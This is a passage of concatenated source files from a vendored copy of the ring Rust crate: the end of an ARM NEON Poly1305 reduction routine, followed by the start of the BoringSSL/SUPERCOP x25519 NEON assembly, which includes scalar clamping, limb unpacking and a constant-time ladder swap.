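# for 26-bit limbs: each limb is split with a shift by 26 and a mask,
# the carry is added into the next limb, and the carry out of r4 is
# multiplied by 5 (t0 plus t0 shifted left by 2) and folded back into
# r0, keeping the result reduced modulo 2^130-5.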
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#2,<r0=reg128#15,#26
# asm 2: vshr.u64 >t1=q1,<r0=q14,#26
vshr.u64 q1,q14,#26
# qhasm: r0 &= mask
# asm 1: vand >r0=reg128#4,<r0=reg128#15,<mask=reg128#1
# asm 2: vand >r0=q3,<r0=q14,<mask=q0
vand q3,q14,q0
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#2,<r1=reg128#3,<t1=reg128#2
# asm 2: vadd.i64 >r1=q1,<r1=q2,<t1=q1
vadd.i64 q1,q2,q1
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#3,<r3=reg128#9,#26
# asm 2: vshr.u64 >t4=q2,<r3=q8,#26
vshr.u64 q2,q8,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#9,<r3=reg128#9,<mask=reg128#1
# asm 2: vand >r3=q8,<r3=q8,<mask=q0
vand q8,q8,q0
# qhasm: 2x r4 += t4
# asm 1: vadd.i64 >r4=reg128#3,<r4=reg128#10,<t4=reg128#3
# asm 2: vadd.i64 >r4=q2,<r4=q9,<t4=q2
vadd.i64 q2,q9,q2
# qhasm: 2x t2 = r1 unsigned>> 26
# asm 1: vshr.u64 >t2=reg128#10,<r1=reg128#2,#26
# asm 2: vshr.u64 >t2=q9,<r1=q1,#26
vshr.u64 q9,q1,#26
# qhasm: r1 &= mask
# asm 1: vand >r1=reg128#2,<r1=reg128#2,<mask=reg128#1
# asm 2: vand >r1=q1,<r1=q1,<mask=q0
vand q1,q1,q0
# qhasm: 2x t0 = r4 unsigned>> 26
# asm 1: vshr.u64 >t0=reg128#11,<r4=reg128#3,#26
# asm 2: vshr.u64 >t0=q10,<r4=q2,#26
vshr.u64 q10,q2,#26
# qhasm: 2x r2 += t2
# asm 1: vadd.i64 >r2=reg128#10,<r2=reg128#16,<t2=reg128#10
# asm 2: vadd.i64 >r2=q9,<r2=q15,<t2=q9
vadd.i64 q9,q15,q9
# qhasm: r4 &= mask
# asm 1: vand >r4=reg128#3,<r4=reg128#3,<mask=reg128#1
# asm 2: vand >r4=q2,<r4=q2,<mask=q0
vand q2,q2,q0
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#11
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q10
vadd.i64 q3,q3,q10
# qhasm: 2x t0 <<= 2
# asm 1: vshl.i64 >t0=reg128#11,<t0=reg128#11,#2
# asm 2: vshl.i64 >t0=q10,<t0=q10,#2
vshl.i64 q10,q10,#2
# qhasm: 2x t3 = r2 unsigned>> 26
# asm 1: vshr.u64 >t3=reg128#12,<r2=reg128#10,#26
# asm 2: vshr.u64 >t3=q11,<r2=q9,#26
vshr.u64 q11,q9,#26
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#11
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q10
vadd.i64 q3,q3,q10
# qhasm: x23 = r2 & mask
# asm 1: vand >x23=reg128#10,<r2=reg128#10,<mask=reg128#1
# asm 2: vand >x23=q9,<r2=q9,<mask=q0
vand q9,q9,q0
# qhasm: 2x r3 += t3
# asm 1: vadd.i64 >r3=reg128#9,<r3=reg128#9,<t3=reg128#12
# asm 2: vadd.i64 >r3=q8,<r3=q8,<t3=q11
vadd.i64 q8,q8,q11
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#11,<r0=reg128#4,#26
# asm 2: vshr.u64 >t1=q10,<r0=q3,#26
vshr.u64 q10,q3,#26
# qhasm: x23 = x23[0,2,1,3]
# asm 1: vtrn.32 <x23=reg128#10%bot,<x23=reg128#10%top
# asm 2: vtrn.32 <x23=d18,<x23=d19
vtrn.32 d18,d19
# qhasm: x01 = r0 & mask
# asm 1: vand >x01=reg128#4,<r0=reg128#4,<mask=reg128#1
# asm 2: vand >x01=q3,<r0=q3,<mask=q0
vand q3,q3,q0
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#2,<r1=reg128#2,<t1=reg128#11
# asm 2: vadd.i64 >r1=q1,<r1=q1,<t1=q10
vadd.i64 q1,q1,q10
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#11,<r3=reg128#9,#26
# asm 2: vshr.u64 >t4=q10,<r3=q8,#26
vshr.u64 q10,q8,#26
# qhasm: x01 = x01[0,2,1,3]
# asm 1: vtrn.32 <x01=reg128#4%bot,<x01=reg128#4%top
# asm 2: vtrn.32 <x01=d6,<x01=d7
vtrn.32 d6,d7
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#1,<r3=reg128#9,<mask=reg128#1
# asm 2: vand >r3=q0,<r3=q8,<mask=q0
vand q0,q8,q0
# qhasm: r1 = r1[0,2,1,3]
# asm 1: vtrn.32 <r1=reg128#2%bot,<r1=reg128#2%top
# asm 2: vtrn.32 <r1=d2,<r1=d3
vtrn.32 d2,d3
# qhasm: 2x x4 = r4 + t4
# asm 1: vadd.i64 >x4=reg128#3,<r4=reg128#3,<t4=reg128#11
# asm 2: vadd.i64 >x4=q2,<r4=q2,<t4=q10
vadd.i64 q2,q2,q10
# qhasm: r3 = r3[0,2,1,3]
# asm 1: vtrn.32 <r3=reg128#1%bot,<r3=reg128#1%top
# asm 2: vtrn.32 <r3=d0,<r3=d1
vtrn.32 d0,d1
# qhasm: x01 = x01[0,1] r1[0,1]
# asm 1: vext.32 <x01=reg128#4%top,<r1=reg128#2%bot,<r1=reg128#2%bot,#0
# asm 2: vext.32 <x01=d7,<r1=d2,<r1=d2,#0
vext.32 d7,d2,d2,#0
# qhasm: x23 = x23[0,1] r3[0,1]
# asm 1: vext.32 <x23=reg128#10%top,<r3=reg128#1%bot,<r3=reg128#1%bot,#0
# asm 2: vext.32 <x23=d19,<r3=d0,<r3=d0,#0
vext.32 d19,d0,d0,#0
# qhasm: x4 = x4[0,2,1,3]
# asm 1: vtrn.32 <x4=reg128#3%bot,<x4=reg128#3%top
# asm 2: vtrn.32 <x4=d4,<x4=d5
vtrn.32 d4,d5
# qhasm: mem128[input_0] aligned= x01;input_0+=16
# asm 1: vst1.8 {<x01=reg128#4%bot-<x01=reg128#4%top},[<input_0=int32#1,: 128]!
# asm 2: vst1.8 {<x01=d6-<x01=d7},[<input_0=r0,: 128]!
vst1.8 {d6-d7},[r0,: 128]!
# qhasm: mem128[input_0] aligned= x23;input_0+=16
# asm 1: vst1.8 {<x23=reg128#10%bot-<x23=reg128#10%top},[<input_0=int32#1,: 128]!
# asm 2: vst1.8 {<x23=d18-<x23=d19},[<input_0=r0,: 128]!
vst1.8 {d18-d19},[r0,: 128]!
# qhasm: mem64[input_0] aligned= x4[0]
# asm 1: vst1.8 <x4=reg128#3%bot,[<input_0=int32#1,: 64]
# asm 2: vst1.8 <x4=d4,[<input_0=r0,: 64]
vst1.8 d4,[r0,: 64]
# qhasm: return
add sp,sp,#0
bx lr
#endif /* !OPENSSL_NO_ASM && OPENSSL_ARM && __ELF__ */
|
mi2bjss/Pressel-site | 41,448 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/crypto/curve25519/asm/x25519-asm-arm.S | // Copyright 2015 The BoringSSL Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/* This file is taken from crypto_scalarmult/curve25519/neon2/scalarmult.s in
* SUPERCOP 20141124 (http://bench.cr.yp.to/supercop.html). That code is public
* domain licensed but the standard Apache 2.0 license is included above to keep
* licensing simple. */
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
.fpu neon
.text
.align 4
.global x25519_NEON
.hidden x25519_NEON
.type x25519_NEON, %function
x25519_NEON:
vpush {q4,q5,q6,q7}
mov r12,sp
sub sp,sp,#736
and sp,sp,#0xffffffe0
strd r4,[sp,#0]
strd r6,[sp,#8]
strd r8,[sp,#16]
strd r10,[sp,#24]
str r12,[sp,#480]
str r14,[sp,#484]
mov r0,r0
mov r1,r1
mov r2,r2
add r3,sp,#32
ldr r4,=0
ldr r5,=254
vmov.i32 q0,#1
vshr.u64 q1,q0,#7
vshr.u64 q0,q0,#8
vmov.i32 d4,#19
vmov.i32 d5,#38
add r6,sp,#512
vst1.8 {d2-d3},[r6,: 128]
add r6,sp,#528
vst1.8 {d0-d1},[r6,: 128]
add r6,sp,#544
vst1.8 {d4-d5},[r6,: 128]
add r6,r3,#0
vmov.i32 q2,#0
vst1.8 {d4-d5},[r6,: 128]!
vst1.8 {d4-d5},[r6,: 128]!
vst1.8 d4,[r6,: 64]
add r6,r3,#0
ldr r7,=960
sub r7,r7,#2
neg r7,r7
sub r7,r7,r7,LSL #7
str r7,[r6]
add r6,sp,#704
vld1.8 {d4-d5},[r1]!
vld1.8 {d6-d7},[r1]
vst1.8 {d4-d5},[r6,: 128]!
vst1.8 {d6-d7},[r6,: 128]
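/* Note: the byte fixups below clamp the 32-byte scalar as specified
 * for X25519 (RFC 7748): clear the three lowest bits, clear the top
 * bit, and set bit 254, before the ladder consumes the scalar. */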
sub r1,r6,#16
ldrb r6,[r1]
and r6,r6,#248
strb r6,[r1]
ldrb r6,[r1,#31]
and r6,r6,#127
orr r6,r6,#64
strb r6,[r1,#31]
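/* Note: the loads and shift/mask sequence that follows appears to
 * unpack the 32-byte little-endian field element into ten limbs of
 * alternating 26 and 25 bits (radix 2^25.5), the representation this
 * NEON ladder uses for arithmetic modulo 2^255-19. */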
vmov.i64 q2,#0xffffffff
vshr.u64 q3,q2,#7
vshr.u64 q2,q2,#6
vld1.8 {d8},[r2]
vld1.8 {d10},[r2]
add r2,r2,#6
vld1.8 {d12},[r2]
vld1.8 {d14},[r2]
add r2,r2,#6
vld1.8 {d16},[r2]
add r2,r2,#4
vld1.8 {d18},[r2]
vld1.8 {d20},[r2]
add r2,r2,#6
vld1.8 {d22},[r2]
add r2,r2,#2
vld1.8 {d24},[r2]
vld1.8 {d26},[r2]
vshr.u64 q5,q5,#26
vshr.u64 q6,q6,#3
vshr.u64 q7,q7,#29
vshr.u64 q8,q8,#6
vshr.u64 q10,q10,#25
vshr.u64 q11,q11,#3
vshr.u64 q12,q12,#12
vshr.u64 q13,q13,#38
vand q4,q4,q2
vand q6,q6,q2
vand q8,q8,q2
vand q10,q10,q2
vand q2,q12,q2
vand q5,q5,q3
vand q7,q7,q3
vand q9,q9,q3
vand q11,q11,q3
vand q3,q13,q3
add r2,r3,#48
vadd.i64 q12,q4,q1
vadd.i64 q13,q10,q1
vshr.s64 q12,q12,#26
vshr.s64 q13,q13,#26
vadd.i64 q5,q5,q12
vshl.i64 q12,q12,#26
vadd.i64 q14,q5,q0
vadd.i64 q11,q11,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q11,q0
vsub.i64 q4,q4,q12
vshr.s64 q12,q14,#25
vsub.i64 q10,q10,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q12
vshl.i64 q12,q12,#25
vadd.i64 q14,q6,q1
vadd.i64 q2,q2,q13
vsub.i64 q5,q5,q12
vshr.s64 q12,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q1
vadd.i64 q7,q7,q12
vshl.i64 q12,q12,#26
vadd.i64 q15,q7,q0
vsub.i64 q11,q11,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q12
vshr.s64 q12,q15,#25
vadd.i64 q3,q3,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q3,q0
vadd.i64 q8,q8,q12
vshl.i64 q12,q12,#25
vadd.i64 q15,q8,q1
add r2,r2,#8
vsub.i64 q2,q2,q13
vshr.s64 q13,q14,#25
vsub.i64 q7,q7,q12
vshr.s64 q12,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q9,q9,q12
vtrn.32 d12,d14
vshl.i64 q12,q12,#26
vtrn.32 d13,d15
vadd.i64 q0,q9,q0
vadd.i64 q4,q4,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q6,q13,#4
vsub.i64 q7,q8,q12
vshr.s64 q0,q0,#25
vadd.i64 q4,q4,q6
vadd.i64 q6,q10,q0
vshl.i64 q0,q0,#25
vadd.i64 q8,q6,q1
vadd.i64 q4,q4,q13
vshl.i64 q10,q13,#25
vadd.i64 q1,q4,q1
vsub.i64 q0,q9,q0
vshr.s64 q8,q8,#26
vsub.i64 q3,q3,q10
vtrn.32 d14,d0
vshr.s64 q1,q1,#26
vtrn.32 d15,d1
vadd.i64 q0,q11,q8
vst1.8 d14,[r2,: 64]
vshl.i64 q7,q8,#26
vadd.i64 q5,q5,q1
vtrn.32 d4,d6
vshl.i64 q1,q1,#26
vtrn.32 d5,d7
vsub.i64 q3,q6,q7
add r2,r2,#16
vsub.i64 q1,q4,q1
vst1.8 d4,[r2,: 64]
vtrn.32 d6,d0
vtrn.32 d7,d1
sub r2,r2,#8
vtrn.32 d2,d10
vtrn.32 d3,d11
vst1.8 d6,[r2,: 64]
sub r2,r2,#24
vst1.8 d2,[r2,: 64]
add r2,r3,#96
vmov.i32 q0,#0
vmov.i64 d2,#0xff
vmov.i64 d3,#0
vshr.u32 q1,q1,#7
vst1.8 {d2-d3},[r2,: 128]!
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 d0,[r2,: 64]
add r2,r3,#144
vmov.i32 q0,#0
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 d0,[r2,: 64]
add r2,r3,#240
vmov.i32 q0,#0
vmov.i64 d2,#0xff
vmov.i64 d3,#0
vshr.u32 q1,q1,#7
vst1.8 {d2-d3},[r2,: 128]!
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 d0,[r2,: 64]
add r2,r3,#48
add r6,r3,#192
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4},[r2,: 64]
vst1.8 {d0-d1},[r6,: 128]!
vst1.8 {d2-d3},[r6,: 128]!
vst1.8 d4,[r6,: 64]
._mainloop:
mov r2,r5,LSR #3
and r6,r5,#7
ldrb r2,[r1,r2]
mov r2,r2,LSR r6
and r2,r2,#1
str r5,[sp,#488]
eor r4,r4,r2
str r2,[sp,#492]
neg r2,r4
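/* Note: r2 now holds 0 or -1 (all ones) depending on the current key
 * bit; the vdup/veor/vand/veor pattern below uses it as a mask to
 * perform a constant-time conditional swap of the two ladder points,
 * avoiding any data-dependent branches or loads. */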
add r4,r3,#96
add r5,r3,#192
add r6,r3,#144
vld1.8 {d8-d9},[r4,: 128]!
add r7,r3,#240
vld1.8 {d10-d11},[r5,: 128]!
veor q6,q4,q5
vld1.8 {d14-d15},[r6,: 128]!
vdup.i32 q8,r2
vld1.8 {d18-d19},[r7,: 128]!
veor q10,q7,q9
vld1.8 {d22-d23},[r4,: 128]!
vand q6,q6,q8
vld1.8 {d24-d25},[r5,: 128]!
vand q10,q10,q8
vld1.8 {d26-d27},[r6,: 128]!
veor q4,q4,q6
vld1.8 {d28-d29},[r7,: 128]!
veor q5,q5,q6
vld1.8 {d0},[r4,: 64]
veor q6,q7,q10
vld1.8 {d2},[r5,: 64]
veor q7,q9,q10
vld1.8 {d4},[r6,: 64]
veor q9,q11,q12
vld1.8 {d6},[r7,: 64]
veor q10,q0,q1
sub r2,r4,#32
vand q9,q9,q8
sub r4,r5,#32
vand q10,q10,q8
sub r5,r6,#32
veor q11,q11,q9
sub r6,r7,#32
veor q0,q0,q10
veor q9,q12,q9
veor q1,q1,q10
veor q10,q13,q14
veor q12,q2,q3
vand q10,q10,q8
vand q8,q12,q8
veor q12,q13,q10
veor q2,q2,q8
veor q10,q14,q10
veor q3,q3,q8
vadd.i32 q8,q4,q6
vsub.i32 q4,q4,q6
vst1.8 {d16-d17},[r2,: 128]!
vadd.i32 q6,q11,q12
vst1.8 {d8-d9},[r5,: 128]!
vsub.i32 q4,q11,q12
vst1.8 {d12-d13},[r2,: 128]!
vadd.i32 q6,q0,q2
vst1.8 {d8-d9},[r5,: 128]!
vsub.i32 q0,q0,q2
vst1.8 d12,[r2,: 64]
vadd.i32 q2,q5,q7
vst1.8 d0,[r5,: 64]
vsub.i32 q0,q5,q7
vst1.8 {d4-d5},[r4,: 128]!
vadd.i32 q2,q9,q10
vst1.8 {d0-d1},[r6,: 128]!
vsub.i32 q0,q9,q10
vst1.8 {d4-d5},[r4,: 128]!
vadd.i32 q2,q1,q3
vst1.8 {d0-d1},[r6,: 128]!
vsub.i32 q0,q1,q3
vst1.8 d4,[r4,: 64]
vst1.8 d0,[r6,: 64]
add r2,sp,#544
add r4,r3,#96
add r5,r3,#144
vld1.8 {d0-d1},[r2,: 128]
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4-d5},[r5,: 128]!
vzip.i32 q1,q2
vld1.8 {d6-d7},[r4,: 128]!
vld1.8 {d8-d9},[r5,: 128]!
vshl.i32 q5,q1,#1
vzip.i32 q3,q4
vshl.i32 q6,q2,#1
vld1.8 {d14},[r4,: 64]
vshl.i32 q8,q3,#1
vld1.8 {d15},[r5,: 64]
vshl.i32 q9,q4,#1
vmul.i32 d21,d7,d1
vtrn.32 d14,d15
vmul.i32 q11,q4,q0
vmul.i32 q0,q7,q0
vmull.s32 q12,d2,d2
vmlal.s32 q12,d11,d1
vmlal.s32 q12,d12,d0
vmlal.s32 q12,d13,d23
vmlal.s32 q12,d16,d22
vmlal.s32 q12,d7,d21
vmull.s32 q10,d2,d11
vmlal.s32 q10,d4,d1
vmlal.s32 q10,d13,d0
vmlal.s32 q10,d6,d23
vmlal.s32 q10,d17,d22
vmull.s32 q13,d10,d4
vmlal.s32 q13,d11,d3
vmlal.s32 q13,d13,d1
vmlal.s32 q13,d16,d0
vmlal.s32 q13,d17,d23
vmlal.s32 q13,d8,d22
vmull.s32 q1,d10,d5
vmlal.s32 q1,d11,d4
vmlal.s32 q1,d6,d1
vmlal.s32 q1,d17,d0
vmlal.s32 q1,d8,d23
vmull.s32 q14,d10,d6
vmlal.s32 q14,d11,d13
vmlal.s32 q14,d4,d4
vmlal.s32 q14,d17,d1
vmlal.s32 q14,d18,d0
vmlal.s32 q14,d9,d23
vmull.s32 q11,d10,d7
vmlal.s32 q11,d11,d6
vmlal.s32 q11,d12,d5
vmlal.s32 q11,d8,d1
vmlal.s32 q11,d19,d0
vmull.s32 q15,d10,d8
vmlal.s32 q15,d11,d17
vmlal.s32 q15,d12,d6
vmlal.s32 q15,d13,d5
vmlal.s32 q15,d19,d1
vmlal.s32 q15,d14,d0
vmull.s32 q2,d10,d9
vmlal.s32 q2,d11,d8
vmlal.s32 q2,d12,d7
vmlal.s32 q2,d13,d6
vmlal.s32 q2,d14,d1
vmull.s32 q0,d15,d1
vmlal.s32 q0,d10,d14
vmlal.s32 q0,d11,d19
vmlal.s32 q0,d12,d8
vmlal.s32 q0,d13,d17
vmlal.s32 q0,d6,d6
add r2,sp,#512
vld1.8 {d18-d19},[r2,: 128]
vmull.s32 q3,d16,d7
vmlal.s32 q3,d10,d15
vmlal.s32 q3,d11,d14
vmlal.s32 q3,d12,d9
vmlal.s32 q3,d13,d8
add r2,sp,#528
vld1.8 {d8-d9},[r2,: 128]
vadd.i64 q5,q12,q9
vadd.i64 q6,q15,q9
vshr.s64 q5,q5,#26
vshr.s64 q6,q6,#26
vadd.i64 q7,q10,q5
vshl.i64 q5,q5,#26
vadd.i64 q8,q7,q4
vadd.i64 q2,q2,q6
vshl.i64 q6,q6,#26
vadd.i64 q10,q2,q4
vsub.i64 q5,q12,q5
vshr.s64 q8,q8,#25
vsub.i64 q6,q15,q6
vshr.s64 q10,q10,#25
vadd.i64 q12,q13,q8
vshl.i64 q8,q8,#25
vadd.i64 q13,q12,q9
vadd.i64 q0,q0,q10
vsub.i64 q7,q7,q8
vshr.s64 q8,q13,#26
vshl.i64 q10,q10,#25
vadd.i64 q13,q0,q9
vadd.i64 q1,q1,q8
vshl.i64 q8,q8,#26
vadd.i64 q15,q1,q4
vsub.i64 q2,q2,q10
vshr.s64 q10,q13,#26
vsub.i64 q8,q12,q8
vshr.s64 q12,q15,#25
vadd.i64 q3,q3,q10
vshl.i64 q10,q10,#26
vadd.i64 q13,q3,q4
vadd.i64 q14,q14,q12
add r2,r3,#288
vshl.i64 q12,q12,#25
add r4,r3,#336
vadd.i64 q15,q14,q9
add r2,r2,#8
vsub.i64 q0,q0,q10
add r4,r4,#8
vshr.s64 q10,q13,#25
vsub.i64 q1,q1,q12
vshr.s64 q12,q15,#26
vadd.i64 q13,q10,q10
vadd.i64 q11,q11,q12
vtrn.32 d16,d2
vshl.i64 q12,q12,#26
vtrn.32 d17,d3
vadd.i64 q1,q11,q4
vadd.i64 q4,q5,q13
vst1.8 d16,[r2,: 64]!
vshl.i64 q5,q10,#4
vst1.8 d17,[r4,: 64]!
vsub.i64 q8,q14,q12
vshr.s64 q1,q1,#25
vadd.i64 q4,q4,q5
vadd.i64 q5,q6,q1
vshl.i64 q1,q1,#25
vadd.i64 q6,q5,q9
vadd.i64 q4,q4,q10
vshl.i64 q10,q10,#25
vadd.i64 q9,q4,q9
vsub.i64 q1,q11,q1
vshr.s64 q6,q6,#26
vsub.i64 q3,q3,q10
vtrn.32 d16,d2
vshr.s64 q9,q9,#26
vtrn.32 d17,d3
vadd.i64 q1,q2,q6
vst1.8 d16,[r2,: 64]
vshl.i64 q2,q6,#26
vst1.8 d17,[r4,: 64]
vadd.i64 q6,q7,q9
vtrn.32 d0,d6
vshl.i64 q7,q9,#26
vtrn.32 d1,d7
vsub.i64 q2,q5,q2
add r2,r2,#16
vsub.i64 q3,q4,q7
vst1.8 d0,[r2,: 64]
add r4,r4,#16
vst1.8 d1,[r4,: 64]
vtrn.32 d4,d2
vtrn.32 d5,d3
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d6,d12
vtrn.32 d7,d13
vst1.8 d4,[r2,: 64]
vst1.8 d5,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d6,[r2,: 64]
vst1.8 d7,[r4,: 64]
add r2,r3,#240
add r4,r3,#96
vld1.8 {d0-d1},[r4,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4},[r4,: 64]
add r4,r3,#144
vld1.8 {d6-d7},[r4,: 128]!
vtrn.32 q0,q3
vld1.8 {d8-d9},[r4,: 128]!
vshl.i32 q5,q0,#4
vtrn.32 q1,q4
vshl.i32 q6,q3,#4
vadd.i32 q5,q5,q0
vadd.i32 q6,q6,q3
vshl.i32 q7,q1,#4
vld1.8 {d5},[r4,: 64]
vshl.i32 q8,q4,#4
vtrn.32 d4,d5
vadd.i32 q7,q7,q1
vadd.i32 q8,q8,q4
vld1.8 {d18-d19},[r2,: 128]!
vshl.i32 q10,q2,#4
vld1.8 {d22-d23},[r2,: 128]!
vadd.i32 q10,q10,q2
vld1.8 {d24},[r2,: 64]
vadd.i32 q5,q5,q0
add r2,r3,#192
vld1.8 {d26-d27},[r2,: 128]!
vadd.i32 q6,q6,q3
vld1.8 {d28-d29},[r2,: 128]!
vadd.i32 q8,q8,q4
vld1.8 {d25},[r2,: 64]
vadd.i32 q10,q10,q2
vtrn.32 q9,q13
vadd.i32 q7,q7,q1
vadd.i32 q5,q5,q0
vtrn.32 q11,q14
vadd.i32 q6,q6,q3
add r2,sp,#560
vadd.i32 q10,q10,q2
vtrn.32 d24,d25
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q6,q13,#1
add r2,sp,#576
vst1.8 {d20-d21},[r2,: 128]
vshl.i32 q10,q14,#1
add r2,sp,#592
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q15,q12,#1
vadd.i32 q8,q8,q4
vext.32 d10,d31,d30,#0
vadd.i32 q7,q7,q1
add r2,sp,#608
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q8,d18,d5
vmlal.s32 q8,d26,d4
vmlal.s32 q8,d19,d9
vmlal.s32 q8,d27,d3
vmlal.s32 q8,d22,d8
vmlal.s32 q8,d28,d2
vmlal.s32 q8,d23,d7
vmlal.s32 q8,d29,d1
vmlal.s32 q8,d24,d6
vmlal.s32 q8,d25,d0
add r2,sp,#624
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q2,d18,d4
vmlal.s32 q2,d12,d9
vmlal.s32 q2,d13,d8
vmlal.s32 q2,d19,d3
vmlal.s32 q2,d22,d2
vmlal.s32 q2,d23,d1
vmlal.s32 q2,d24,d0
add r2,sp,#640
vst1.8 {d20-d21},[r2,: 128]
vmull.s32 q7,d18,d9
vmlal.s32 q7,d26,d3
vmlal.s32 q7,d19,d8
vmlal.s32 q7,d27,d2
vmlal.s32 q7,d22,d7
vmlal.s32 q7,d28,d1
vmlal.s32 q7,d23,d6
vmlal.s32 q7,d29,d0
add r2,sp,#656
vst1.8 {d10-d11},[r2,: 128]
vmull.s32 q5,d18,d3
vmlal.s32 q5,d19,d2
vmlal.s32 q5,d22,d1
vmlal.s32 q5,d23,d0
vmlal.s32 q5,d12,d8
add r2,sp,#672
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q4,d18,d8
vmlal.s32 q4,d26,d2
vmlal.s32 q4,d19,d7
vmlal.s32 q4,d27,d1
vmlal.s32 q4,d22,d6
vmlal.s32 q4,d28,d0
vmull.s32 q8,d18,d7
vmlal.s32 q8,d26,d1
vmlal.s32 q8,d19,d6
vmlal.s32 q8,d27,d0
add r2,sp,#576
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q7,d24,d21
vmlal.s32 q7,d25,d20
vmlal.s32 q4,d23,d21
vmlal.s32 q4,d29,d20
vmlal.s32 q8,d22,d21
vmlal.s32 q8,d28,d20
vmlal.s32 q5,d24,d20
add r2,sp,#576
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q7,d18,d6
vmlal.s32 q7,d26,d0
add r2,sp,#656
vld1.8 {d30-d31},[r2,: 128]
vmlal.s32 q2,d30,d21
vmlal.s32 q7,d19,d21
vmlal.s32 q7,d27,d20
add r2,sp,#624
vld1.8 {d26-d27},[r2,: 128]
vmlal.s32 q4,d25,d27
vmlal.s32 q8,d29,d27
vmlal.s32 q8,d25,d26
vmlal.s32 q7,d28,d27
vmlal.s32 q7,d29,d26
add r2,sp,#608
vld1.8 {d28-d29},[r2,: 128]
vmlal.s32 q4,d24,d29
vmlal.s32 q8,d23,d29
vmlal.s32 q8,d24,d28
vmlal.s32 q7,d22,d29
vmlal.s32 q7,d23,d28
add r2,sp,#608
vst1.8 {d8-d9},[r2,: 128]
add r2,sp,#560
vld1.8 {d8-d9},[r2,: 128]
vmlal.s32 q7,d24,d9
vmlal.s32 q7,d25,d31
vmull.s32 q1,d18,d2
vmlal.s32 q1,d19,d1
vmlal.s32 q1,d22,d0
vmlal.s32 q1,d24,d27
vmlal.s32 q1,d23,d20
vmlal.s32 q1,d12,d7
vmlal.s32 q1,d13,d6
vmull.s32 q6,d18,d1
vmlal.s32 q6,d19,d0
vmlal.s32 q6,d23,d27
vmlal.s32 q6,d22,d20
vmlal.s32 q6,d24,d26
vmull.s32 q0,d18,d0
vmlal.s32 q0,d22,d27
vmlal.s32 q0,d23,d26
vmlal.s32 q0,d24,d31
vmlal.s32 q0,d19,d20
add r2,sp,#640
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q2,d18,d7
vmlal.s32 q2,d19,d6
vmlal.s32 q5,d18,d6
vmlal.s32 q5,d19,d21
vmlal.s32 q1,d18,d21
vmlal.s32 q1,d19,d29
vmlal.s32 q0,d18,d28
vmlal.s32 q0,d19,d9
vmlal.s32 q6,d18,d29
vmlal.s32 q6,d19,d28
add r2,sp,#592
vld1.8 {d18-d19},[r2,: 128]
add r2,sp,#512
vld1.8 {d22-d23},[r2,: 128]
vmlal.s32 q5,d19,d7
vmlal.s32 q0,d18,d21
vmlal.s32 q0,d19,d29
vmlal.s32 q6,d18,d6
add r2,sp,#528
vld1.8 {d6-d7},[r2,: 128]
vmlal.s32 q6,d19,d21
add r2,sp,#576
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q0,d30,d8
add r2,sp,#672
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q5,d30,d29
add r2,sp,#608
vld1.8 {d24-d25},[r2,: 128]
vmlal.s32 q1,d30,d28
vadd.i64 q13,q0,q11
vadd.i64 q14,q5,q11
vmlal.s32 q6,d30,d9
vshr.s64 q4,q13,#26
vshr.s64 q13,q14,#26
vadd.i64 q7,q7,q4
vshl.i64 q4,q4,#26
vadd.i64 q14,q7,q3
vadd.i64 q9,q9,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q9,q3
vsub.i64 q0,q0,q4
vshr.s64 q4,q14,#25
vsub.i64 q5,q5,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q4
vshl.i64 q4,q4,#25
vadd.i64 q14,q6,q11
vadd.i64 q2,q2,q13
vsub.i64 q4,q7,q4
vshr.s64 q7,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q11
vadd.i64 q8,q8,q7
vshl.i64 q7,q7,#26
